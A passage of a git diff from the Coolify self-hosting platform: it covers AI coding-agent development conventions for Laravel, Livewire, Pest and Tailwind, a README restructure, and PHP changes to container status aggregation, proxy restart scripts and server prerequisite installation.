auto-stemming - query=authentication - finds 'authenticate' and 'auth' -2. Multiple Words (AND Logic) - query=rate limit - finds knowledge containing both "rate" AND "limit" -3. Quoted Phrases (Exact Position) - query="infinite scroll" - Words must be adjacent and in that order -4. Mixed Queries - query=middleware "rate limit" - "middleware" AND exact phrase "rate limit" -5. Multiple Queries - queries=["authentication", "middleware"] - ANY of these terms - - -=== php rules === - -## PHP - -- Always use curly braces for control structures, even if it has one line. - -### Constructors -- Use PHP 8 constructor property promotion in `__construct()`. - - public function __construct(public GitHub $github) { } -- Do not allow empty `__construct()` methods with zero parameters. - -### Type Declarations -- Always use explicit return type declarations for methods and functions. -- Use appropriate PHP type hints for method parameters. - - -protected function isAccessible(User $user, ?string $path = null): bool -{ - ... -} - - -## Comments -- Prefer PHPDoc blocks over comments. Never use comments within the code itself unless there is something _very_ complex going on. - -## PHPDoc Blocks -- Add useful array shape type definitions for arrays when appropriate. - -## Enums -- Typically, keys in an Enum should be TitleCase. For example: `FavoritePerson`, `BestLake`, `Monthly`. - - -=== laravel/core rules === - -## Do Things the Laravel Way - -- Use `php artisan make:` commands to create new files (i.e. migrations, controllers, models, etc.). You can list available Artisan commands using the `list-artisan-commands` tool. -- If you're creating a generic PHP class, use `artisan make:class`. -- Pass `--no-interaction` to all Artisan commands to ensure they work without user input. You should also pass the correct `--options` to ensure correct behavior. - -### Database -- Always use proper Eloquent relationship methods with return type hints. Prefer relationship methods over raw queries or manual joins. -- Use Eloquent models and relationships before suggesting raw database queries -- Avoid `DB::`; prefer `Model::query()`. Generate code that leverages Laravel's ORM capabilities rather than bypassing them. -- Generate code that prevents N+1 query problems by using eager loading. -- Use Laravel's query builder for very complex database operations. - -### Model Creation -- When creating new models, create useful factories and seeders for them too. Ask the user if they need any other things, using `list-artisan-commands` to check the available options to `php artisan make:model`. - -### APIs & Eloquent Resources -- For APIs, default to using Eloquent API Resources and API versioning unless existing API routes do not, then you should follow existing application convention. - -### Controllers & Validation -- Always create Form Request classes for validation rather than inline validation in controllers. Include both validation rules and custom error messages. -- Check sibling Form Requests to see if the application uses array or string based validation rules. - -### Queues -- Use queued jobs for time-consuming operations with the `ShouldQueue` interface. - -### Authentication & Authorization -- Use Laravel's built-in authentication and authorization features (gates, policies, Sanctum, etc.). - -### URL Generation -- When generating links to other pages, prefer named routes and the `route()` function. - -### Configuration -- Use environment variables only in configuration files - never use the `env()` function directly outside of config files. Always use `config('app.name')`, not `env('APP_NAME')`. - -### Testing -- When creating models for tests, use the factories for the models. Check if the factory has custom states that can be used before manually setting up the model. -- Faker: Use methods such as `$this->faker->word()` or `fake()->randomDigit()`. Follow existing conventions whether to use `$this->faker` or `fake()`. -- When creating tests, make use of `php artisan make:test [options] ` to create a feature test, and pass `--unit` to create a unit test. Most tests should be feature tests. - -### Vite Error -- If you receive an "Illuminate\Foundation\ViteException: Unable to locate file in Vite manifest" error, you can run `npm run build` or ask the user to run `npm run dev` or `composer run dev`. - - -=== laravel/v12 rules === - -## Laravel 12 - -- Use the `search-docs` tool to get version specific documentation. -- This project upgraded from Laravel 10 without migrating to the new streamlined Laravel file structure. -- This is **perfectly fine** and recommended by Laravel. Follow the existing structure from Laravel 10. We do not to need migrate to the new Laravel structure unless the user explicitly requests that. - -### Laravel 10 Structure -- Middleware typically lives in `app/Http/Middleware/` and service providers in `app/Providers/`. -- There is no `bootstrap/app.php` application configuration in a Laravel 10 structure: - - Middleware registration happens in `app/Http/Kernel.php` - - Exception handling is in `app/Exceptions/Handler.php` - - Console commands and schedule register in `app/Console/Kernel.php` - - Rate limits likely exist in `RouteServiceProvider` or `app/Http/Kernel.php` - -### Database -- When modifying a column, the migration must include all of the attributes that were previously defined on the column. Otherwise, they will be dropped and lost. -- Laravel 12 allows limiting eagerly loaded records natively, without external packages: `$query->latest()->limit(10);`. - -### Models -- Casts can and likely should be set in a `casts()` method on a model rather than the `$casts` property. Follow existing conventions from other models. - - -=== livewire/core rules === - -## Livewire Core -- Use the `search-docs` tool to find exact version specific documentation for how to write Livewire & Livewire tests. -- Use the `php artisan make:livewire [Posts\\CreatePost]` artisan command to create new components -- State should live on the server, with the UI reflecting it. -- All Livewire requests hit the Laravel backend, they're like regular HTTP requests. Always validate form data, and run authorization checks in Livewire actions. - -## Livewire Best Practices -- Livewire components require a single root element. -- Use `wire:loading` and `wire:dirty` for delightful loading states. -- Add `wire:key` in loops: - - ```blade - @foreach ($items as $item) -
- {{ $item->name }} -
- @endforeach - ``` - -- Prefer lifecycle hooks like `mount()`, `updatedFoo()`) for initialization and reactive side effects: - - - public function mount(User $user) { $this->user = $user; } - public function updatedSearch() { $this->resetPage(); } - - - -## Testing Livewire - - - Livewire::test(Counter::class) - ->assertSet('count', 0) - ->call('increment') - ->assertSet('count', 1) - ->assertSee(1) - ->assertStatus(200); - - - - - $this->get('/posts/create') - ->assertSeeLivewire(CreatePost::class); - - - -=== livewire/v3 rules === - -## Livewire 3 - -### Key Changes From Livewire 2 -- These things changed in Livewire 2, but may not have been updated in this application. Verify this application's setup to ensure you conform with application conventions. - - Use `wire:model.live` for real-time updates, `wire:model` is now deferred by default. - - Components now use the `App\Livewire` namespace (not `App\Http\Livewire`). - - Use `$this->dispatch()` to dispatch events (not `emit` or `dispatchBrowserEvent`). - - Use the `components.layouts.app` view as the typical layout path (not `layouts.app`). - -### New Directives -- `wire:show`, `wire:transition`, `wire:cloak`, `wire:offline`, `wire:target` are available for use. Use the documentation to find usage examples. - -### Alpine -- Alpine is now included with Livewire, don't manually include Alpine.js. -- Plugins included with Alpine: persist, intersect, collapse, and focus. - -### Lifecycle Hooks -- You can listen for `livewire:init` to hook into Livewire initialization, and `fail.status === 419` for the page expiring: - - -document.addEventListener('livewire:init', function () { - Livewire.hook('request', ({ fail }) => { - if (fail && fail.status === 419) { - alert('Your session expired'); - } - }); - - Livewire.hook('message.failed', (message, component) => { - console.error(message); - }); -}); - - - -=== pint/core rules === - -## Laravel Pint Code Formatter - -- You must run `vendor/bin/pint --dirty` before finalizing changes to ensure your code matches the project's expected style. -- Do not run `vendor/bin/pint --test`, simply run `vendor/bin/pint` to fix any formatting issues. - - -=== pest/core rules === - -## Pest - -### Testing -- If you need to verify a feature is working, write or update a Unit / Feature test. - -### Pest Tests -- All tests must be written using Pest. Use `php artisan make:test --pest `. -- You must not remove any tests or test files from the tests directory without approval. These are not temporary or helper files - these are core to the application. -- Tests should test all of the happy paths, failure paths, and weird paths. -- Tests live in the `tests/Feature` and `tests/Unit` directories. -- **Unit tests** MUST use mocking and avoid database. They can run outside Docker. -- **Feature tests** can use database but MUST run inside Docker container. -- **Design for testability**: Structure code to be testable without database when possible. Use dependency injection and interfaces. -- **Mock by default**: Prefer `Mockery::mock()` over `Model::factory()->create()` in unit tests. -- Pest tests look and behave like this: - -it('is true', function () { - expect(true)->toBeTrue(); -}); - - -### Running Tests -**IMPORTANT**: Always run tests in the correct environment based on database dependencies: - -**Unit Tests (no database):** -- Run outside Docker: `./vendor/bin/pest tests/Unit` -- Run specific file: `./vendor/bin/pest tests/Unit/ProxyCustomCommandsTest.php` -- These tests use mocking and don't require PostgreSQL - -**Feature Tests (with database):** -- Run inside Docker: `docker exec coolify php artisan test` -- Run specific file: `docker exec coolify php artisan test tests/Feature/ExampleTest.php` -- Filter by name: `docker exec coolify php artisan test --filter=testName` -- These tests require PostgreSQL and use factories/migrations - -**General Guidelines:** -- Run the minimal number of tests using an appropriate filter before finalizing code edits -- When the tests relating to your changes are passing, ask the user if they would like to run the entire test suite -- If you get database connection errors, you're running a Feature test outside Docker - move it inside - -### Pest Assertions -- When asserting status codes on a response, use the specific method like `assertForbidden` and `assertNotFound` instead of using `assertStatus(403)` or similar, e.g.: - -it('returns all', function () { - $response = $this->postJson('/api/docs', []); - - $response->assertSuccessful(); -}); - - -### Mocking -- Mocking can be very helpful when appropriate. -- When mocking, you can use the `Pest\Laravel\mock` Pest function, but always import it via `use function Pest\Laravel\mock;` before using it. Alternatively, you can use `$this->mock()` if existing tests do. -- You can also create partial mocks using the same import or self method. - -### Datasets -- Use datasets in Pest to simplify tests which have a lot of duplicated data. This is often the case when testing validation rules, so consider going with this solution when writing tests for validation rules. - - -it('has emails', function (string $email) { - expect($email)->not->toBeEmpty(); -})->with([ - 'james' => 'james@laravel.com', - 'taylor' => 'taylor@laravel.com', -]); - - - -=== tailwindcss/core rules === - -## Tailwind Core - -- Use Tailwind CSS classes to style HTML, check and use existing tailwind conventions within the project before writing your own. -- Offer to extract repeated patterns into components that match the project's conventions (i.e. Blade, JSX, Vue, etc..) -- Think through class placement, order, priority, and defaults - remove redundant classes, add classes to parent or child carefully to limit repetition, group elements logically -- You can use the `search-docs` tool to get exact examples from the official documentation when needed. - -### Spacing -- When listing items, use gap utilities for spacing, don't use margins. - - -
-
Superior
-
Michigan
-
Erie
-
- - - -### Dark Mode -- If existing pages and components support dark mode, new pages and components must support dark mode in a similar way, typically using `dark:`. - - -=== tailwindcss/v4 rules === - -## Tailwind 4 - -- Always use Tailwind CSS v4 - do not use the deprecated utilities. -- `corePlugins` is not supported in Tailwind v4. -- In Tailwind v4, you import Tailwind using a regular CSS `@import` statement, not using the `@tailwind` directives used in v3: - - - - -### Replaced Utilities -- Tailwind v4 removed deprecated utilities. Do not use the deprecated option - use the replacement. -- Opacity values are still numeric. - -| Deprecated | Replacement | -|------------+--------------| -| bg-opacity-* | bg-black/* | -| text-opacity-* | text-black/* | -| border-opacity-* | border-black/* | -| divide-opacity-* | divide-black/* | -| ring-opacity-* | ring-black/* | -| placeholder-opacity-* | placeholder-black/* | -| flex-shrink-* | shrink-* | -| flex-grow-* | grow-* | -| overflow-ellipsis | text-ellipsis | -| decoration-slice | box-decoration-slice | -| decoration-clone | box-decoration-clone | - - -=== tests rules === - -## Test Enforcement - -- Every change must be programmatically tested. Write a new test or update an existing test, then run the affected tests to make sure they pass. -- Run the minimum number of tests needed to ensure code quality and speed. -- **For Unit tests**: Use `./vendor/bin/pest tests/Unit/YourTest.php` (runs outside Docker) -- **For Feature tests**: Use `docker exec coolify php artisan test --filter=YourTest` (runs inside Docker) -- Choose the correct test type based on database dependency: - - No database needed? → Unit test with mocking - - Database needed? → Feature test in Docker - +- Livewire components require single root element +- Use `wire:model.live` for real-time updates +- Alpine.js included with Livewire +- Tailwind CSS 4.1.4 (use new utilities, not deprecated ones) +- Use `gap` utilities for spacing, not margins Random other things you should remember: diff --git a/README.md b/README.md index 456a1268e..a84b3bfa9 100644 --- a/README.md +++ b/README.md @@ -1,9 +1,13 @@ -![Latest Release Version](https://img.shields.io/badge/dynamic/json?labelColor=grey&color=6366f1&label=Latest_released_version&url=https%3A%2F%2Fcdn.coollabs.io%2Fcoolify%2Fversions.json&query=coolify.v4.version&style=for-the-badge -) +
-[![Bounty Issues](https://img.shields.io/static/v1?labelColor=grey&color=6366f1&label=Algora&message=%F0%9F%92%8E+Bounty+issues&style=for-the-badge)](https://console.algora.io/org/coollabsio/bounties/new) +# Coolify +An open-source & self-hostable Heroku / Netlify / Vercel alternative. -# About the Project +![Latest Release Version](https://img.shields.io/badge/dynamic/json?labelColor=grey&color=6366f1&label=Latest%20released%20version&url=https%3A%2F%2Fcdn.coollabs.io%2Fcoolify%2Fversions.json&query=coolify.v4.version&style=for-the-badge +) [![Bounty Issues](https://img.shields.io/static/v1?labelColor=grey&color=6366f1&label=Algora&message=%F0%9F%92%8E+Bounty+issues&style=for-the-badge)](https://console.algora.io/org/coollabsio/bounties/new) +
+ +## About the Project Coolify is an open-source & self-hostable alternative to Heroku / Netlify / Vercel / etc. @@ -15,7 +19,7 @@ # About the Project For more information, take a look at our landing page at [coolify.io](https://coolify.io). -# Installation +## Installation ```bash curl -fsSL https://cdn.coollabs.io/coolify/install.sh | bash @@ -25,11 +29,11 @@ # Installation > [!NOTE] > Please refer to the [docs](https://coolify.io/docs/installation) for more information about the installation. -# Support +## Support Contact us at [coolify.io/docs/contact](https://coolify.io/docs/contact). -# Cloud +## Cloud If you do not want to self-host Coolify, there is a paid cloud version available: [app.coolify.io](https://app.coolify.io) @@ -44,14 +48,14 @@ ## Why should I use the Cloud version? - Better support - Less maintenance for you -# Donations +## Donations To stay completely free and open-source, with no feature behind the paywall and evolve the project, we need your help. If you like Coolify, please consider donating to help us fund the project's future development. [coolify.io/sponsorships](https://coolify.io/sponsorships) Thank you so much! -## Big Sponsors +### Big Sponsors * [23M](https://23m.com?ref=coolify.io) - Your experts for high-availability hosting solutions! * [Algora](https://algora.io?ref=coolify.io) - Open source contribution platform @@ -88,7 +92,7 @@ ## Big Sponsors * [Ubicloud](https://www.ubicloud.com?ref=coolify.io) - Open source cloud infrastructure platform -## Small Sponsors +### Small Sponsors OpenElements XamanApp @@ -141,7 +145,7 @@ ## Small Sponsors ...and many more at [GitHub Sponsors](https://github.com/sponsors/coollabsio) -# Recognitions +## Recognitions

@@ -157,17 +161,17 @@ # Recognitions coollabsio%2Fcoolify | Trendshift -# Core Maintainers +## Core Maintainers | Andras Bacsai | 🏔️ Peak | |------------|------------| | Andras Bacsai | peaklabs-dev | | | | -# Repo Activity +## Repo Activity ![Alt](https://repobeats.axiom.co/api/embed/eab1c8066f9c59d0ad37b76c23ebb5ccac4278ae.svg "Repobeats analytics image") -# Star History +## Star History [![Star History Chart](https://api.star-history.com/svg?repos=coollabsio/coolify&type=Date)](https://star-history.com/#coollabsio/coolify&Date) diff --git a/app/Actions/Database/RestartDatabase.php b/app/Actions/Database/RestartDatabase.php index 0400d924d..940bc69fb 100644 --- a/app/Actions/Database/RestartDatabase.php +++ b/app/Actions/Database/RestartDatabase.php @@ -22,7 +22,7 @@ public function handle(StandaloneRedis|StandalonePostgresql|StandaloneMongodb|St if (! $server->isFunctional()) { return 'Server is not functional'; } - StopDatabase::run($database); + StopDatabase::run($database, dockerCleanup: false); return StartDatabase::run($database); } diff --git a/app/Actions/Docker/GetContainersStatus.php b/app/Actions/Docker/GetContainersStatus.php index f5d5f82b6..61a3c4615 100644 --- a/app/Actions/Docker/GetContainersStatus.php +++ b/app/Actions/Docker/GetContainersStatus.php @@ -8,13 +8,17 @@ use App\Models\ApplicationPreview; use App\Models\Server; use App\Models\ServiceDatabase; +use App\Services\ContainerStatusAggregator; +use App\Traits\CalculatesExcludedStatus; use Illuminate\Support\Arr; use Illuminate\Support\Collection; +use Illuminate\Support\Facades\DB; use Lorisleiva\Actions\Concerns\AsAction; class GetContainersStatus { use AsAction; + use CalculatesExcludedStatus; public string $jobQueue = 'high'; @@ -28,6 +32,10 @@ class GetContainersStatus protected ?Collection $applicationContainerStatuses; + protected ?Collection $applicationContainerRestartCounts; + + protected ?Collection $serviceContainerStatuses; + public function handle(Server $server, ?Collection $containers = null, ?Collection $containerReplicates = null) { $this->containers = $containers; @@ -95,11 +103,15 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti $labels = data_get($container, 'Config.Labels'); } $containerStatus = data_get($container, 'State.Status'); - $containerHealth = data_get($container, 'State.Health.Status', 'unhealthy'); + $containerHealth = data_get($container, 'State.Health.Status'); if ($containerStatus === 'restarting') { - $containerStatus = "restarting ($containerHealth)"; + $healthSuffix = $containerHealth ?? 'unknown'; + $containerStatus = "restarting:$healthSuffix"; + } elseif ($containerStatus === 'exited') { + // Keep as-is, no health suffix for exited containers } else { - $containerStatus = "$containerStatus ($containerHealth)"; + $healthSuffix = $containerHealth ?? 'unknown'; + $containerStatus = "$containerStatus:$healthSuffix"; } $labels = Arr::undot(format_docker_labels_to_json($labels)); $applicationId = data_get($labels, 'coolify.applicationId'); @@ -136,6 +148,18 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti if ($containerName) { $this->applicationContainerStatuses->get($applicationId)->put($containerName, $containerStatus); } + + // Track restart counts for applications + $restartCount = data_get($container, 'RestartCount', 0); + if (! isset($this->applicationContainerRestartCounts)) { + $this->applicationContainerRestartCounts = collect(); + } + if (! $this->applicationContainerRestartCounts->has($applicationId)) { + $this->applicationContainerRestartCounts->put($applicationId, collect()); + } + if ($containerName) { + $this->applicationContainerRestartCounts->get($applicationId)->put($containerName, $restartCount); + } } else { // Notify user that this container should not be there. } @@ -207,23 +231,34 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti if ($serviceLabelId) { $subType = data_get($labels, 'coolify.service.subType'); $subId = data_get($labels, 'coolify.service.subId'); - $service = $services->where('id', $serviceLabelId)->first(); - if (! $service) { + $parentService = $services->where('id', $serviceLabelId)->first(); + if (! $parentService) { continue; } + + // Store container status for aggregation + if (! isset($this->serviceContainerStatuses)) { + $this->serviceContainerStatuses = collect(); + } + + $key = $serviceLabelId.':'.$subType.':'.$subId; + if (! $this->serviceContainerStatuses->has($key)) { + $this->serviceContainerStatuses->put($key, collect()); + } + + $containerName = data_get($labels, 'com.docker.compose.service'); + if ($containerName) { + $this->serviceContainerStatuses->get($key)->put($containerName, $containerStatus); + } + + // Mark service as found if ($subType === 'application') { - $service = $service->applications()->where('id', $subId)->first(); + $service = $parentService->applications()->where('id', $subId)->first(); } else { - $service = $service->databases()->where('id', $subId)->first(); + $service = $parentService->databases()->where('id', $subId)->first(); } if ($service) { $foundServices[] = "$service->id-$service->name"; - $statusFromDb = $service->status; - if ($statusFromDb !== $containerStatus) { - $service->update(['status' => $containerStatus]); - } else { - $service->update(['last_online_at' => now()]); - } } } } @@ -291,7 +326,24 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti continue; } - $application->update(['status' => 'exited']); + // If container was recently restarting (crash loop), keep it as degraded for a grace period + // This prevents false "exited" status during the brief moment between container removal and recreation + $recentlyRestarted = $application->restart_count > 0 && + $application->last_restart_at && + $application->last_restart_at->greaterThan(now()->subSeconds(30)); + + if ($recentlyRestarted) { + // Keep it as degraded if it was recently in a crash loop + $application->update(['status' => 'degraded:unhealthy']); + } else { + // Reset restart count when application exits completely + $application->update([ + 'status' => 'exited', + 'restart_count' => 0, + 'last_restart_at' => null, + 'last_restart_type' => null, + ]); + } } $notRunningApplicationPreviews = $previews->pluck('id')->diff($foundApplicationPreviews); foreach ($notRunningApplicationPreviews as $previewId) { @@ -340,88 +392,144 @@ public function handle(Server $server, ?Collection $containers = null, ?Collecti continue; } - $aggregatedStatus = $this->aggregateApplicationStatus($application, $containerStatuses); - if ($aggregatedStatus) { - $statusFromDb = $application->status; - if ($statusFromDb !== $aggregatedStatus) { - $application->update(['status' => $aggregatedStatus]); - } else { - $application->update(['last_online_at' => now()]); - } + // Track restart counts first + $maxRestartCount = 0; + if (isset($this->applicationContainerRestartCounts) && $this->applicationContainerRestartCounts->has($applicationId)) { + $containerRestartCounts = $this->applicationContainerRestartCounts->get($applicationId); + $maxRestartCount = $containerRestartCounts->max() ?? 0; } + + // Wrap all database updates in a transaction to ensure consistency + DB::transaction(function () use ($application, $maxRestartCount, $containerStatuses) { + $previousRestartCount = $application->restart_count ?? 0; + + if ($maxRestartCount > $previousRestartCount) { + // Restart count increased - this is a crash restart + $application->update([ + 'restart_count' => $maxRestartCount, + 'last_restart_at' => now(), + 'last_restart_type' => 'crash', + ]); + + // Send notification + $containerName = $application->name; + $projectUuid = data_get($application, 'environment.project.uuid'); + $environmentName = data_get($application, 'environment.name'); + $applicationUuid = data_get($application, 'uuid'); + + if ($projectUuid && $applicationUuid && $environmentName) { + $url = base_url().'/project/'.$projectUuid.'/'.$environmentName.'/application/'.$applicationUuid; + } else { + $url = null; + } + } + + // Aggregate status after tracking restart counts + $aggregatedStatus = $this->aggregateApplicationStatus($application, $containerStatuses, $maxRestartCount); + if ($aggregatedStatus) { + $statusFromDb = $application->status; + if ($statusFromDb !== $aggregatedStatus) { + $application->update(['status' => $aggregatedStatus]); + } else { + $application->update(['last_online_at' => now()]); + } + } + }); } } + // Aggregate multi-container service statuses + $this->aggregateServiceContainerStatuses($services); + ServiceChecked::dispatch($this->server->team->id); } - private function aggregateApplicationStatus($application, Collection $containerStatuses): ?string + private function aggregateApplicationStatus($application, Collection $containerStatuses, int $maxRestartCount = 0): ?string { // Parse docker compose to check for excluded containers $dockerComposeRaw = data_get($application, 'docker_compose_raw'); - $excludedContainers = collect(); - - if ($dockerComposeRaw) { - try { - $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw); - $services = data_get($dockerCompose, 'services', []); - - foreach ($services as $serviceName => $serviceConfig) { - // Check if container should be excluded - $excludeFromHc = data_get($serviceConfig, 'exclude_from_hc', false); - $restartPolicy = data_get($serviceConfig, 'restart', 'always'); - - if ($excludeFromHc || $restartPolicy === 'no') { - $excludedContainers->push($serviceName); - } - } - } catch (\Exception $e) { - // If we can't parse, treat all containers as included - } - } + $excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw); // Filter out excluded containers $relevantStatuses = $containerStatuses->filter(function ($status, $containerName) use ($excludedContainers) { return ! $excludedContainers->contains($containerName); }); - // If all containers are excluded, don't update status + // If all containers are excluded, calculate status from excluded containers if ($relevantStatuses->isEmpty()) { - return null; + return $this->calculateExcludedStatusFromStrings($containerStatuses); } - $hasRunning = false; - $hasRestarting = false; - $hasUnhealthy = false; - $hasExited = false; + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; - foreach ($relevantStatuses as $status) { - if (str($status)->contains('restarting')) { - $hasRestarting = true; - } elseif (str($status)->contains('running')) { - $hasRunning = true; - if (str($status)->contains('unhealthy')) { - $hasUnhealthy = true; + return $aggregator->aggregateFromStrings($relevantStatuses, $maxRestartCount); + } + + private function aggregateServiceContainerStatuses($services) + { + if (! isset($this->serviceContainerStatuses) || $this->serviceContainerStatuses->isEmpty()) { + return; + } + + foreach ($this->serviceContainerStatuses as $key => $containerStatuses) { + // Parse key: serviceId:subType:subId + [$serviceId, $subType, $subId] = explode(':', $key); + + $service = $services->where('id', $serviceId)->first(); + if (! $service) { + continue; + } + + // Get the service sub-resource (ServiceApplication or ServiceDatabase) + $subResource = null; + if ($subType === 'application') { + $subResource = $service->applications()->where('id', $subId)->first(); + } elseif ($subType === 'database') { + $subResource = $service->databases()->where('id', $subId)->first(); + } + + if (! $subResource) { + continue; + } + + // Parse docker compose from service to check for excluded containers + $dockerComposeRaw = data_get($service, 'docker_compose_raw'); + $excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw); + + // Filter out excluded containers + $relevantStatuses = $containerStatuses->filter(function ($status, $containerName) use ($excludedContainers) { + return ! $excludedContainers->contains($containerName); + }); + + // If all containers are excluded, calculate status from excluded containers + if ($relevantStatuses->isEmpty()) { + $aggregatedStatus = $this->calculateExcludedStatusFromStrings($containerStatuses); + if ($aggregatedStatus) { + $statusFromDb = $subResource->status; + if ($statusFromDb !== $aggregatedStatus) { + $subResource->update(['status' => $aggregatedStatus]); + } else { + $subResource->update(['last_online_at' => now()]); + } + } + + continue; + } + + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; + $aggregatedStatus = $aggregator->aggregateFromStrings($relevantStatuses); + + // Update service sub-resource status with aggregated result + if ($aggregatedStatus) { + $statusFromDb = $subResource->status; + if ($statusFromDb !== $aggregatedStatus) { + $subResource->update(['status' => $aggregatedStatus]); + } else { + $subResource->update(['last_online_at' => now()]); } - } elseif (str($status)->contains('exited')) { - $hasExited = true; - $hasUnhealthy = true; } } - - if ($hasRestarting) { - return 'degraded (unhealthy)'; - } - - if ($hasRunning && $hasExited) { - return 'degraded (unhealthy)'; - } - - if ($hasRunning) { - return $hasUnhealthy ? 'running (unhealthy)' : 'running (healthy)'; - } - - // All containers are exited - return 'exited (unhealthy)'; } } diff --git a/app/Actions/Proxy/StartProxy.php b/app/Actions/Proxy/StartProxy.php index 8671a5f27..20c997656 100644 --- a/app/Actions/Proxy/StartProxy.php +++ b/app/Actions/Proxy/StartProxy.php @@ -13,7 +13,7 @@ class StartProxy { use AsAction; - public function handle(Server $server, bool $async = true, bool $force = false): string|Activity + public function handle(Server $server, bool $async = true, bool $force = false, bool $restarting = false): string|Activity { $proxyType = $server->proxyType(); if ((is_null($proxyType) || $proxyType === 'NONE' || $server->proxy->force_stop || $server->isBuildServer()) && $force === false) { @@ -22,7 +22,10 @@ public function handle(Server $server, bool $async = true, bool $force = false): $server->proxy->set('status', 'starting'); $server->save(); $server->refresh(); - ProxyStatusChangedUI::dispatch($server->team_id); + + if (! $restarting) { + ProxyStatusChangedUI::dispatch($server->team_id); + } $commands = collect([]); $proxy_path = $server->proxyPath(); @@ -60,9 +63,22 @@ public function handle(Server $server, bool $async = true, bool $force = false): 'docker compose pull', 'if docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', " echo 'Stopping and removing existing coolify-proxy.'", - ' docker rm -f coolify-proxy || true', + ' docker stop coolify-proxy 2>/dev/null || true', + ' docker rm -f coolify-proxy 2>/dev/null || true', + ' # Wait for container to be fully removed', + ' for i in {1..10}; do', + ' if ! docker ps -a --format "{{.Names}}" | grep -q "^coolify-proxy$"; then', + ' break', + ' fi', + ' echo "Waiting for coolify-proxy to be removed... ($i/10)"', + ' sleep 1', + ' done', " echo 'Successfully stopped and removed existing coolify-proxy.'", 'fi', + ]); + // Ensure required networks exist BEFORE docker compose up (networks are declared as external) + $commands = $commands->merge(ensureProxyNetworksExist($server)); + $commands = $commands->merge([ "echo 'Starting coolify-proxy.'", 'docker compose up -d --wait --remove-orphans', "echo 'Successfully started coolify-proxy.'", diff --git a/app/Actions/Proxy/StopProxy.php b/app/Actions/Proxy/StopProxy.php index 310185473..04d031ec6 100644 --- a/app/Actions/Proxy/StopProxy.php +++ b/app/Actions/Proxy/StopProxy.php @@ -12,17 +12,27 @@ class StopProxy { use AsAction; - public function handle(Server $server, bool $forceStop = true, int $timeout = 30) + public function handle(Server $server, bool $forceStop = true, int $timeout = 30, bool $restarting = false) { try { $containerName = $server->isSwarm() ? 'coolify-proxy_traefik' : 'coolify-proxy'; $server->proxy->status = 'stopping'; $server->save(); - ProxyStatusChangedUI::dispatch($server->team_id); + + if (! $restarting) { + ProxyStatusChangedUI::dispatch($server->team_id); + } instant_remote_process(command: [ - "docker stop -t $timeout $containerName", - "docker rm -f $containerName", + "docker stop -t=$timeout $containerName 2>/dev/null || true", + "docker rm -f $containerName 2>/dev/null || true", + '# Wait for container to be fully removed', + 'for i in {1..10}; do', + " if ! docker ps -a --format \"{{.Names}}\" | grep -q \"^$containerName$\"; then", + ' break', + ' fi', + ' sleep 1', + 'done', ], server: $server, throwError: false); $server->proxy->force_stop = $forceStop; @@ -32,7 +42,10 @@ public function handle(Server $server, bool $forceStop = true, int $timeout = 30 return handleError($e); } finally { ProxyDashboardCacheService::clearCache($server); - ProxyStatusChanged::dispatch($server->id); + + if (! $restarting) { + ProxyStatusChanged::dispatch($server->id); + } } } } diff --git a/app/Actions/Server/InstallDocker.php b/app/Actions/Server/InstallDocker.php index 92dd7e8c3..36c540950 100644 --- a/app/Actions/Server/InstallDocker.php +++ b/app/Actions/Server/InstallDocker.php @@ -59,8 +59,6 @@ public function handle(Server $server) $command = collect([]); if (isDev() && $server->id === 0) { $command = $command->merge([ - "echo 'Installing Prerequisites...'", - 'sleep 1', "echo 'Installing Docker Engine...'", "echo 'Configuring Docker Engine (merging existing configuration with the required)...'", 'sleep 4', @@ -70,35 +68,6 @@ public function handle(Server $server) return remote_process($command, $server); } else { - if ($supported_os_type->contains('debian')) { - $command = $command->merge([ - "echo 'Installing Prerequisites...'", - 'apt-get update -y', - 'command -v curl >/dev/null || apt install -y curl', - 'command -v wget >/dev/null || apt install -y wget', - 'command -v git >/dev/null || apt install -y git', - 'command -v jq >/dev/null || apt install -y jq', - ]); - } elseif ($supported_os_type->contains('rhel')) { - $command = $command->merge([ - "echo 'Installing Prerequisites...'", - 'command -v curl >/dev/null || dnf install -y curl', - 'command -v wget >/dev/null || dnf install -y wget', - 'command -v git >/dev/null || dnf install -y git', - 'command -v jq >/dev/null || dnf install -y jq', - ]); - } elseif ($supported_os_type->contains('sles')) { - $command = $command->merge([ - "echo 'Installing Prerequisites...'", - 'zypper update -y', - 'command -v curl >/dev/null || zypper install -y curl', - 'command -v wget >/dev/null || zypper install -y wget', - 'command -v git >/dev/null || zypper install -y git', - 'command -v jq >/dev/null || zypper install -y jq', - ]); - } else { - throw new \Exception('Unsupported OS'); - } $command = $command->merge([ "echo 'Installing Docker Engine...'", ]); diff --git a/app/Actions/Server/InstallPrerequisites.php b/app/Actions/Server/InstallPrerequisites.php new file mode 100644 index 000000000..1a7d3bbd9 --- /dev/null +++ b/app/Actions/Server/InstallPrerequisites.php @@ -0,0 +1,57 @@ +validateOS(); + if (! $supported_os_type) { + throw new \Exception('Server OS type is not supported for automated installation. Please install prerequisites manually.'); + } + + $command = collect([]); + + if ($supported_os_type->contains('debian')) { + $command = $command->merge([ + "echo 'Installing Prerequisites...'", + 'apt-get update -y', + 'command -v curl >/dev/null || apt install -y curl', + 'command -v wget >/dev/null || apt install -y wget', + 'command -v git >/dev/null || apt install -y git', + 'command -v jq >/dev/null || apt install -y jq', + ]); + } elseif ($supported_os_type->contains('rhel')) { + $command = $command->merge([ + "echo 'Installing Prerequisites...'", + 'command -v curl >/dev/null || dnf install -y curl', + 'command -v wget >/dev/null || dnf install -y wget', + 'command -v git >/dev/null || dnf install -y git', + 'command -v jq >/dev/null || dnf install -y jq', + ]); + } elseif ($supported_os_type->contains('sles')) { + $command = $command->merge([ + "echo 'Installing Prerequisites...'", + 'zypper update -y', + 'command -v curl >/dev/null || zypper install -y curl', + 'command -v wget >/dev/null || zypper install -y wget', + 'command -v git >/dev/null || zypper install -y git', + 'command -v jq >/dev/null || zypper install -y jq', + ]); + } else { + throw new \Exception('Unsupported OS type for prerequisites installation'); + } + + $command->push("echo 'Prerequisites installed successfully.'"); + + return 